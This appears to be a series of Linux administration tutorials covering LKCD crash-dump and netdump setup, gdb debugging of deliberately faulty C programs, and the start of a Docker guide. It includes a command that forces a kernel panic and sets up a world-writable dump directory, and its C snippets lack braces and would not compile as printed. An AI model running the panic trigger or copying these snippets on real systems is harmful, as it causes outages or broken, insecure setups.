/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the/etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.


And a screenshot of the configuration file in action, just to make you feel comfortable:


Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

Do nothing, just return if called
Dump the dump header and first 128K bytes out
Everything in DUMP_HEADER and kernel pages only
Everything except kernel free pages
All memory

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

Local block device
Network device

Later, we will also use the network option. For now, we need local.


Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed or use RLE or GZIP to compress them. It’s up to you.


I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.

Additional settings

There are several other directives listed in the configuration file. These other directives are all set to the the configuration defaults. You can find a brief explanation on each below. If you find the section inadequate, please email me and I’ll elaborate.

These include:

  • DUMP_SAVE=”1″ – Save the memory image to disk
  • PANIC_TIMEOUT=”5″ – The timeout (in seconds) before a reboot after panic occurs
  • BOUNDS_LIMIT =”10″ – A limit on the number of dumps kept
  • KEXEC_IMAGE=”/boot/vmlinuz” – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE=”root console=tty0″ – Defines what parameters the kernel should use when booting after the crash; usually, you won’t have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step we need to do is enable the core dump capturing. In other words, we need to sort of source the configuration file so the LKCD utility can use the values set in it. This is done by running the lkcd configcommand, followed by lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, the LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …


Disk-based dumping may not always succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like the md RAID devices, presenting another problem into the equation. Therefore, to overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider using the network dumping option. Therefore, before we demonstrate the LKCD functionality, we’ll study the netdump option first.

LKCD netdump procedure

Netdump procedure is different from the local dump in having two machines involved in the process. One is the host itself that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port to incoming network traffic, particular to the LKCD netdump. When crashes are sent, they will be saved to the local block device on the server. Other terms used to describe the relationship between the netdump server and the client is that of source and target, if you will: the client is a source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.


Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.


Make sure dump directory is writable for the netdump user

This directive is extremely important. It defines the ability of the netdump service to write to the partitions / directories on the server. The netdump server run as the netdump user. We need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status


netstat -tulpen | grep 6688
udp 0 0* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

Client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When kernel crashes for whatever reason on this machine, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we have configured our clients to dump their core to the /dev/vmdump device. However, network dump requires an active network interface. There are other considerations in place as well, but we will review them later.


Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it’s the server machine we configured above. To configure this directive – and the one after – we need to go back to our server and collect some information, the output from the ifconfig command, listing the IP address and the MAC address. For example:

inet addr:
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:


Alternatively, it is also possible to use hostnames, but this requires the use of hosts file, DNS, NIS or other name resolution mechanisms properly set and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:



Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means /24 subnet. We’ll see an example for this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.


Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.


And image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd querycommands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:


This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to create panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been set:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.


Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:



LKCD is a very useful application, although it has its limitations.

On one hand, it provides with the critical ability to perform indepth forensics on crashed systems post-mortem. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on the internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large RAM, when dumping the entire contents of the memory to local partitions might be problematic. Furthermore, the netdump functionality allows LKCD to be used on hosts configured with RAID, since LKCD is unable to work with md partitions, overcoming the problem.

However, the limitation to use within the same network segment severely limits the ability to mass-deploy the netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers can be used without relying on specific network topography.

Lastly, LKCD is a somewhat old utility and might not work well on the modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article

Linux Super-Duper Admin Tools: GNU Debugger (gbd)

Let’s talk debug. So you wrote a piece of code and you want to compile it and run it. Or you have a binary and you just run it. The only problem is, the execution fails with a segmentation fault. For all practical purposes, you call it a day.

Luckily for you, the ultimate combination of the GNU Debugger (gdb) and Dedoimedo tutorials will help you overcome the problem. Today, we will learn how to handle misbehaving binary code, how to examine its execution step by step, how to interpret errors and problems, and we will even step into the assembly code and hunt for problems there. This won’t be easy, but it sure will be one of the best super-duper admin guides you have read so far.



I repeat: this will not be easy. Working with gdb is not something anyone can do at their leisure. There are many requirements you must meet before you can have a successful session.


You can debug code without having access to source files. However, your task will be more difficult, because you will not be able to refer to the actual code and try to understand if there’s any kind of logical fallacy in the execution. You will only be able to follow symptoms and try to figure out where things might be wrong, but not why.

Sources compiled with symbols

On top of that, you will want sources with symbols, so you can map instructions in the binary program to their corresponding functions and lines in the source code. Otherwise, you will be sort of groping in the dark.

Understanding of gdb

This tutorial will teach you a handful of basic and intermediate commands, so you need not worry too much about that. However, if you really find the concepts alien and you struggle with compilations and working on the command line in general, perhaps this topic is a little advanced for you at the moment.

Understanding of Linux system

This is probably the most important element. First, you will need some core knowledge of the memory management in Linux. Then, the fundamental concepts like code, data, heap, stack and whatnot. You should also be able to navigate /proc with some degree of comfort. You should also be familiar with the AT&T Assembly syntax, which is the syntax used in Linux, as opposed to Intel syntax, for example.

All right, if you meet all of the above – or wish to – then you can proceed.

Simple example

We will begin with a simple example – a null pointer. In layman’s terms, null pointer is a pointer to an address in the memory space that does not have a meaningful value and cannot be referenced by the calling program, for whatever reason. This will normally lead to an unhandled error, resulting in a segmentation fault.

Here’s our source code:

Source code

#include <stdio.h>

int main (int argc, char* argv[])
int* boom=0;
printf(“hello %d”,*boom);

Now, let’s us compile it, with symbols. This is done by using the -g flag when running gcc. We have seen this before, in the Linux Kernel Crash Book examples.


gcc -g source.c -o naughty-file.bin

And then, we run it and get a nasty segmentation fault:


Now, you may want to try to debug this problem using standard tools, like perhaps strace, ltrace, maybe lsof, and a few others. Normally, you would do this, because having a methodical approach to problem solving is always good, and you should start with simple things first. However, I will purposefully not do that right now to keep the mind clobber at a minimum. As we advance in the tutorial, we will see more complex examples and the use of other tools, too.

All right, so now we need to start using the GNU Debugger. We will invoke the program once again, this time through gdb. The syntax is simple:

gdb <program>

And so we do it.

Invoked gdb

For the time being, nothing happens. The important thing is that gdb has read symbols from our binary. The next step is to run the program and reproduce the segmentation fault. To do this, simply use the commandrun inside gdb.


We see several important details. One, that separate debuginfo (symbols) for third-party libraries, which are not part of our own code, are missing. This means that we can hook into their execution, but we won’t see any symbols. We’ll see an example soon. Two, we see that our program crashes. The problem is in the sixth line of source, as shown in the image, our printf line. Does this mean there’s a problem with printf? Probably not, but something in the variable that printf is trying to use, most likely. The plot thickens.

What we learn here is that we have symbols, that gdb won’t run automatically and that we have a meaningful way of reproducing the problem. This is very important to remember, but we will recap this when we discuss when to run or not to run gdb.


Running through the program does not yield enough meaningful information. We need to halt the execution just before the printf line. Enter breakpoints, just like when working with a compiler. We will break into the main function and then advance step by step until the problem occurs again, then rerun and break, then execute commands one at a time just short of the segmentation fault.

To this end, we need the break command, which lets you specify breakpoints either against functions, your own or third-party loaded by external libraries or against specific lines of code in your sources – an example is on the way. Then, we will use info command to examine our breakpoints.

We will place the break point in the main() function. As a rule of thumb, it’s always a good place to start.

break main

Break point

Now we run again. The execution halts when we reach main().

Run with break

Step by step, oooh babe

Now that we have stopped at the entry to main, we will step through code line by line, using the nextcommand. Luckily for us, there isn’t that much code to walk through. After just two steps, we segfault. Good.


We will now rerun the code, break in the main(), do a single next that will lead us to printf, and then we will halt and examine the assembly code no less!



Indeed, at this stage, there’s nothing else the code can tell us. We have exhausted our understanding of what happens in the code. Seemingly, there doesn’t seem to be any great problem, or rather, we can’t see it yet, supposedly.

So we will use the disassemble command, which will dump the assembly code. In a way, it’s no different than what we did when using objdump against a binary in the kernel crash example. The big difference is, you have a full control of your execution here, so you don’t need to understand everything, just limit your work to a small subset of code.

Just type disassemble inside gdb and this will dump the assembly instructions that your code uses. It will look like the screenshot below.


This is probably the most difficult part of the tutorial yet. Assembly code is not easy to digest and looks like Rain Man’s afternoon fun. Let’s try to understand what we see here, again in very simplistic terms.

On the left, we have memory addresses. The second column shows increments in the memory space from the starting address. The third column shows the mnemonic. The fourth column includes actual registers and values.

If you feel lost, consider reading the TL;DR section below, to get even more lost.

All right, there’s a little arrow pointing at the memory address where our execution is right now. We are at offset 40054b, and we have have moved the value that is stored 8 bytes below the base pointer into the RAX register.One line before that, we moved the value 0 into the RBP-8 address. So now, we have the value 0 in the RAX register.

0x00000000400543 <+15> movq $0x0,-0x8(%rbp)
0x0000000040054b <+23> mov  -0x8(%rbp),%rax

Our next instruction is the one that will cause the segmentation fault, as we have seen earlier while next-ing through the code.

0x0000000040054f <+27> mov  (%rax),%edx

So we need to understand what’s wrong here. Let’s examine the EDX register, which is supposed to get this new value. We can do this by using the examine or x command. You can use all kinds of output formats, but that’s not important right now.

x $edx

Register values

And we get a message that we cannot access memory at the specified address. This is the clue right there, problem solved. We tried fondling memory that is not to be fondled. As to why we breached our allocation and how we can know that, we will learn soon.

Not so simple example

Now, we do something more complex. We’ll create a dynamic array called pointer, which also happens to be a pointer, there’s a punny pun right there. We’ll use the standard malloc subroutine for this. We will then loop, incrementing i values by 1 every iteration, then let pointer exceed its allowed memory space, AKA heap overflow. Understandable as a lab case, but let’s see this happen in real life and how we can handle problems like these. Most importantly, we will learn additional gdb commands.

Here’s the source:

#include <stdio.h>
#include <stdlib.h>

int *pointer;
int i;
pointer = malloc(sizeof(int));
for (i = 0; 1; i++)
printf(“pointer[%d] = %d\n”, i, pointer[i]);

Let’s compile:

gcc -g seg.c -o seg

When we run it, we see something like this:


pointer[33785] = 33785
pointer[33786] = 33786
pointer[33787] = 33787
Segmentation fault

Now, before we hit gdb and assembly, let’s try some normal debugging. Ley’s say you want to try to solve the problem with one of the standard system admin and troubleshooting tools like strace. After having heard of strace on Dedoimedo, you know the tool’s worth and you want to attempt the simple steps first. Indeed, strace works well in most cases. But here, it’s of no use.

15715 write(1, “pointer[33784] = 33784\n”, 23) = 23
15715 write(1, “pointer[33785] = 33785\n”, 23) = 23
15715 write(1, “pointer[33786] = 33786\n”, 23) = 23
15715 write(1, “pointer[33787] = 33787\n”, 23) = 23
15715 — SIGSEGV (Segmentation fault) @ 0 (0) —
15715 +++ killed by SIGSEGV +++

Nothing useful there really. In fact, no classic tool will give you any indication what happens here. So we need a debugger, gdb in our case. Load the program.

gdb /tmp/seg


Like before, we set a breakpoint. However, using main() is not going to be good for us, because the program will enter main() once and then loop, never going back to the set breakpoint. So we need something else. We need to break in a specific line of code.

To determine the best place, we could run and try to figure out where the problem occurs. We can also take a look at our code and make an educated guess. This should be somewhere in the for loop of course. So perhaps, the start of it?

Break line



All right, but this is not good enough. We will have a break point at every entry to our loop, and from the execution run, we see there are going to be some 30K + iterations. We cannot possibly manually type contand hit Enter every time. So we need a condition, an if statement that will break only if a specific condition is met.

From our sample run, we see that the problem occurs when i reaches the value of 33787, so we’ll place aconditional break some one or two loop iterations before that. Conditions are set per breakpoint. Notice the breakpoint number, after it is set, because we need that number to set a condition.

break 10
Breakpoint 1 at …

And then:

condition 1 i == 33786


If you had multiple breakpoints and you wanted to set multiple conditions, then you would invoke the correct breakpoint number. All right, we’re ready to roll, hit run and let the for loop churn for a while.

Condition reached

All right, now we walk through the code, step by step using the next command.


All right, we know the problem occurs after pointer[i]=i is set, when the i value is 33787. Which means, we will rerun the program and then stop just short of executing the pointer[i]=i line of code after a successful print of pointer[33787] = 33787.

Now, the next time we reach this point, we create the assembly dump.


We know the problem occurs at offset 4005bc, where we mov %eax value into %rdx. This is similar to what we saw earlier. But we need to understand what happens before that, one or two instructions back.

Stepping through assembly dump

To this end, we will use the stepi command, which can walk the assembly dump, line by line. It’s like next in a way, but you can control individual registers, so to speak.

Take a look at the dump. The last line in the dump is the jump (jmp) instruction back to offset <main+29>, which brings us to mov 0xfffffffffffffffc(%rbp), %eax. This is effectively our for loop. Now, when we hit stepi, we will execute line 4005ac. I omitted the line that reads cltq, because it merely extends the 2-byte EAX into a 4-byte value, that’s because we’re on a 64-bit system.


Now, we have several lines where the i value is incremented and whatnot. But the crucial line is just one short of the segmentation fault. We need to understand what’s inside those registers or if we can access them at all.

RDX register

And turns out we can’t. It’s like we had earlier. But why? How can we know that this address is off limits? How do we know that?

proc mappings

In Linux, you can view the memory maps of any process through /proc/<pid>/maps. It is important to understand what a sample output provides before we can proceed. I’m not going to elaborate too much, but basically:

/proc maps

The first line is the code (or text), the actual binary instructions. The second line shows data, which stores all initialized global variables. The third section is the heap, which is used for dynamic allocations, like malloc. Sometimes, it also includes the .bss segment, which stores statically linked variables and uninitialized global variables. When the .bss segment is small, it can reside inside the data segment.

After that, you get shared libraries, and the first one is the dynamic linker itself. Finally, you get the stack. The two last lines are the Linux gating mechanisms for fast system calls, which replaces the int 0x80 system call that was used in olden days. As you may notice, there are still more memory addresses above the last line, reserved by the kernel.

So here, at a glance, you can examine how your process resides in the memory. When a program is executed through gdb, you can view its memory allocations using the info proc mappings command.

info proc mappings


Three lines, code, data, heap. And for heap, we can see that the end address is 0x522000. And we can’t be using that, so we get our lovely segmentation fault. Back to C code, we will need to figure out what we did wrong, whether we molested our integer, tried an illegal allocation or double freeing or whatever.

Now, if you really wanna go Rain Man on this, you can start counting bytes. In general, we use a single page for code, because our executable is small. We use a single page for data. And then, there’s some heap space, a total of 0x21000, which is 132KB or more specifically 135168 bytes.

On the other hand, we ran through 33788 iterations of the for loop, each 4 bytes in size, as we’re on a 64-bit system. Not 33787 as you may assume from the print output in our program run, but one more, because we started counting i at value 0.

So we get 135152 bytes, which is 16 bytes less that our heap. So you may ask, where did the extra 16 bytes go? Well, we can use the examine command again and check more accurately what happens at the start address.


We print eight 4-byte hexadecimal values. The first 16 bytes are the heap header and the count starts at address 0x501010. So we’re all good here, and we know why we got our nasty segmentation fault. We can examine our source code and try to figure out what we did wrong. Two examples, two problems solved.

Now, we will talk some more about using gdb in general, including collecting application cores and analyzing them, attaching to running processes, more tips on popular gdb commands, and we’ll see yet another example, which shows when gdb is not really useful and yet the assembly dump will tell us all we need, even if we do not have sources.

General advice & more stuff

Analyzing application cores

Similar to kernel crashes, application crashes can create cores that you can analyze later on. There are a few things that you need to make sure are properly set in the system before you can analyze cores.

Enable application cores

You will have to make sure that you can create cores. This is governed via sysctl, but you can also make changes on the fly. Depending on your shell, you will use either the limit or ulimit builtins.

ulimit -c unlimited

And for TCSH:

limit coredumpsize unlimited

Core format

By default, the core will be dumped in the current directory where the binary was executed. But the core name might not be useful of meaningful. So you can change its format, which is governed by the core_pattern setting under /proc. For example:

echo “/tmp/core-%p-%u” > /proc/sys/kernel/core_pattern

This will dump a core under /tmp, with the PID and UID suffixed. There are many other available options. You can also set this option permanently via sysctl.conf. For more reading, perhaps you want to consult thiscyberciti article and this Novell cool solution.

Core dumped

Invoke gdb against core file

Next, your application will crash and create a core. Then, use gdb as follows:

gdb <binary> <core>

Read core

The important thing is that gdb successfully read and loaded the symbols. We can now proceed with the analysis, like before. Some functions will not be available to us, as the core is not a running application, but we will still be able to figure out what went wrong.

Attach to a running process

Similarly, you may want to attach gdb to a running process. As it happens, you may have a problem right now, so you cannot restart the program and try to reproduce the issue at leisure. This may not be the most effective way of debugging problems, but it could give you additional information that may not be available otherwise.

The simplest way to demonstrate this is by altering our example with an extra sleep somewhere. Then, while the program is running, find its PID and attach to it.

gdb -p <process id>

Attach to running process

This example also shows the fact the third-party libraries are stripped, so you get function names, but you don’t know the exact lines of code or the variables. Moreover, using the backtrace (bt) command, we see we’re currently sleeping.

Other useful commands

Let’s list down a few other commands you may want to try and use.

show lets you show contents, as simple as that. set lets you configure variables. For example, you may want to see the initial arguments your program started with and then change them. In our heap overflow example, we could try altering the value of i to see if that affects the program.

show & set

The syntax for setting variables is quite simple. set i=4 would do. You can also set registers, but don’t do this if you don’t know what you’re doing. list lets you dump your code. You can list individual lines, specific functions or entire code. By default, you get ten lines printed, sort of like tail.


Another thing you may want to do is inspect stack frames in detail. We’re already familiar with the infocommand, so what we need now is to invoke it against specific frames, as listed in the backtrace (bt) command. In our heap overflow example, there’s only a single frame.

We break in main, run, display the backtrace and then check info frame 0, as shown in the screenshot below. You get a wealth of information, including the instruction pointer (RIP), the saved instruction pointer from a previous frame, the address and the list of arguments, the address and the list of local variables, the previous stack pointer, and saved registers.

info frame

I mentioned backtrace (bt) earlier, and indeed, it is a most valuable command and best used when you don’t know what your program is doing. External commands can be executed using the shell command. For instance, showing the /proc/PID/maps can also be done by using the shell cat /proc/PID/maps instead of info proc mappings as we did before. If for some reason you cannot use either, then you might want to resort toreadelf to try to decipher the binary. Like we used next and stepi, you can use nexti and step. Let’s not forget finish, jump, until, and call. whatis lets you examine variables.

And that’s enough for this section, I guess.

When to use or not use gdb?

All right, gdb is useful when you have reproducible problems and your binaries have been compiled with symbols. You can also try using gdb against third-party functions, but this won’t guarantee much success.

For instance, we know we’re using printf() in our code. So maybe we need to break there? Well, gdb will informs us that the function is not defined and will create a breakpoint pending on future shared library load. Not a bad idea, but do notice that we don’t see any function names for, because we don’t have symbols, and for that matter, we might not even have sources. Without either, it will not be easy figuring out what went wrong.

(gdb) break printf
Function “printf” not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (printf) pending.
(gdb) run
Starting program: /tmp/segfaults/seg
Breakpoint 2 at 0x2aaaaac113f0
Pending breakpoint “printf” resolved

Breakpoint 2, 0x00002aaaaac113f0 in printf () from /lib64/

Finally, using gdb for sporadic, random problems that are not easily reproduced or those that might stem from hardware problems is a hard, grueling task that will yield few results. Even the trivial examples are not so trivial, so imagine what happens on a real production system, with binaries compiled from sources with thousands of lines of code. Still, you get a taste of the goodness, and you’re hooked now.

Lastly, let’s see an example where gdb is both the worst and best tool for analysis. We’ll create an infinite loop program, nothing sinister, just a bit of while true thingie. This kind of program will loop forever, churning CPU.

If you try strace, you see this – useless:


If you try gdb, it works, we can break in main just fine, but after several next commands, even gdb seems to hang. In this case, you will have to interrupt the execution to get back to your code. Now, with symbols, it’s trivial seeing where the problem lies. But let’s assume that we have nothing; we only know where the problem manifests.


All right, enter disassembly once again. The important thing is that our program revolves around two instructions. You have the comparison (cmpl) and the jump (je). We’re in a tight loop. Naughty. But even if you don’t have the sources, even if the program has no symbols and you don’t know what it’s doing, you can still figure out what’s wrong.

forever, disassemble

TL;DR – Read only if you’re bored

Here’s a bit more about what we saw in the disassemble section. It may help you understand a little better how things work.

Let’s examine the top three lines.

0x00000000400534 <+0> push %rbp
0x00000000400535 <+1> mov  %rsp,%rbp
0x00000000400538 <+4> sub  $0x20,%rsp

These three lines are called the Function Prologue, and it’s automatically added by the GCC compiler on the standard x86 (32-bit) and x86_64 (64-bit) architectures. I’m not sure how things behave on other processors.

The Function Prologue has one function [sic] – to preserve the value of the base pointer of the previous frame on the stack, or in other words, the calling function’s stack frame. On the 32-bit architecture, the EBP register is used for this purpose, on the 64-bit architecture, the RBP register.

So the first instructions pushes (decrements) the stack pointer. Note: the stack grows downwards, so to speak, but this is part of those boring prerequisites we talked about earlier. Then, the stack pointer value is copied into the base pointer register. The third instruction allocates space of 20 bytes for function’s local variables. sub $0x20,%rsp can also be translated as %rsp-20. The actual value will depend on the function’s declaration.

Similarly, at the end of the assembly dump, there’s the Function Epilogue, which does exactly the same like the Prologue, in reverse. The epilogue consists of the leave and ret instructions. In our example, leaveq,retq.

In between, we have all kinds of instructions that depend entirely on how the function is written and what it does. We’ve seen enough earlier, so no need to elaborate more.

To more know about stack frames, you use the backtrace (bt) command and then info. In our two examples, the trace is simple, with just one frame each, but some programs may have 10-15 frames, etc. This is especially useful if you don’t know what the binary is supposed to be doing.


Some more reading

You can read more about AT&T Assembly in this quick ‘n’ dirty guide.

You can also read more about the x86 (and x86_64) assembly language on Wikipedia.

And let’s not forget Call stack.


This was ultra-geeky, I admit, but I think you liked it, if you got this far. Working with gdb is not a simple deal, but the tool is extremely versatile and powerful. You will need a lot of time mastering its commands and abilities to the fullest, best done with real problems that truly emphasize what you’re doing. For starters, grab some bad C code and start practicing.

We learned how to work our way through the code, with break points and conditions, next and stepi commands, assembly dumps, info on various important elements, and whatnot. Alongside the vast array of other powerful tools and admin hacks that I’ve taught you before, your Linux pimpage ought to climb majestically. Stay sweet.

A thorough Introduction Guide To Docker Containers

Let me start with a big promise. You will absolutely LOVE this article today. It’s going to be long, detailed and highly useful. Think GRUB, GRUB2. The same thing here. Only we will tackle Docker, a nice distribution platform that wraps the Linux Containers (LXC) technology in a simple, convenient way.

I will show you how to get started, and then we will create our own containers with SSH and Apache, learn how to use Dockerfiles, expose service ports, and solve an immense number of little bugs and problems that normally never get addressed in public forums. Please, without further ado, follow me.


Table of Contents

  1. Introduction
  2. Docker implementation
  3. Getting started
  4. Docker commands
  5. Pull image
  6. Start a Docker container
  7. Install Apache & SSH
    1. Start service
    2. Apache service
    3. SSH service
  8. Check if Web server is up
    1. Expose incoming ports
    2. Check IP address
    3. Testing new configuration
  9. Check if SSH works
    1. Wait, what is the root password?
  10. Commit image
  11. Dockerfile
    1. Build image
    2. Test image
  12. Alternative build
    1. COPY instruction
  13. Advantages of containers
  14. Problems you may encounter & troubleshooting
  15. Additional commands
    1. Differences between exec and attach
    2. Differences between start and run
    3. Differences between build and create
  16. This is just a beginning …
  17. More reading
  18. Conclusion


I have given a brief overview of the technology in a Gizmo’s Freeware article sometime last year. Now, we are going to get serious about using Docker. First, it is important to remember that this framework allows you to use LXC in a convenient manner, without having to worry about all the little details. It is the next step in this world, the same way OpenStack is the next evolutionary step in the virtualization world. Let me give you some history and analogies.

Virtualization began with software that lets you abstractize your hardware. Then, to make things speedier, virtualization programs began using hardware acceleration, and then you also got paravirtualization. In the end, hypervisors began popping up like mushrooms after rain, and it became somewhat difficult to provision and manage them all. This is the core reason for concepts like OpenStack, which hide different platforms under a unified API.

The containers began their way in a similar manner. First, we had the chroot, but processes running inside the jailed environment shared the same namespace and fought for the same resources. Then, we got the kexec system call, which let us boot into the context of another kernel without going through the BIOS. Then, control groups came about, allowing us to partition system resources like CPU, memory and others into subgroups, thus allowing better control, hence the name, of processes running on the system.

Later on, the Linux kernel began offering a full isolation of resources, using cgroups as the basic partitioning mechanism. Technically, this is a system-level virtualization technology, allowing you to run multiple instances of the running kernel on top of the control host inside self-contained environments, with the added bonus of very little performance penalty and overhead.

Several competing technologies tried to offer similar solutions, like OpenVZ, but the community eventually narrowed down its focus to the native enablement inside the mainline kernel, and this seems to be the future direction. Still, LXC remains somewhat difficult to use, as a fair amount of technical knowledge and scripting is required to get the containers running.

This is where Docker comes into place. It tries to take away the gritty pieces and offer a simple method of spawning new container instances without worrying about the infrastructure backend. Well, almost. But the level of difficulty is much less.

Another strong advantage of Docker is a widespread community acceptance, as well as the emphasis on integration with cloud services. Here we go full buzzword, and this means naming some of the big players like AWS, Hadoop, Azure, Jenkins and others. Then we can also talk about Platform as a Service (Paas), and you can imagine how much money and focus this is going to get in the coming years. The technological landscape is huge and confusing, and it’s definitely going to keep on changing and evolving, with more and more concepts and wrapper technologies coming into life and building on top of Docker.

But we want to focus on the technological side. Once we master the basic, we will slowly expand and began utilizing the strong integration capabilities, the flexibility of the solution, and work on making our cloud ecosystem expertise varied, automated and just pure rad. That won’t happen right now, but I want to help you navigate the first few miles, or should we say kilometers, of the muddy startup waters, so you can begin using Docker in a sensible, efficient way. Since this is a young technology, it’s Wild West out there, and most of the online documentation, tips, tutorials and whatnot are outdated, copy & paste versions that do not help anyone, and largely incomplete. I want to fix that today.

Docker implementation

A bit more boring stuff before we do some cool things. Anyhow, Docker is mostly about LXC, but not just. It’s been designed to be extensible, and it can also interface with libvirt and systemd. In a way, this makes it almost like a hyper-hypervisor, as there’s potential for future growth, and when additional modules are added, it could effectively replace classic hypervisors like Xen or KVM or anything using libvirt and friends.

Docker diagram

This be a public domain image, if you wondered.

Getting started

We will demonstrate using CentOS 7. Not Ubuntu. Most of the online stuff focuses on Ubuntu, but I want to show you how it’s done using as-near-as-enterprise flavor of Linux as possible, because if you’re going to be using Docker, it’s gonna be somewhere business like. The first thing is to install docker:

yum install docker-io

Once the software is installed, you can start using it. However, you may encounter the following two issues the first time you attempt to run docker commands:

docker <any one command>
FATA[0000] Get http:///var/run/docker.sock/v1.18/images/json: dial unix /var/run/docker.sock: no such file or directory. Are you trying to connect to a TLS-enabled daemon without TLS?

And the other error is:

docker <any one command>
FATA[0000] Get http:///var/run/docker.sock/v1.18/containers/json: dial unix /var/run/docker.sock: permission denied. Are you trying to connect to a TLS-enabled daemon without TLS?

The reason is, you need to start the Docker service first. Moreover, you must run the technology as root, because Docker needs access to some rather sensitive pieces of the system, and interact with the kernel. That’s how it works.

systemctl start docker

Now we can go crazy and begin using Docker.

Docker commands

The basic thing is to run docker help to get the available list of commands. I will not go through all the options. We will learn more about them as we go along. In general, if you’re ever in doubt, you should consult the pretty decent online documentation. The complete CLI reference also kicks ass. And then, there’s also an excellent cheat sheet on GitHub. But our first mission will be to download a new Docker image and then run our first instance.

Pull image

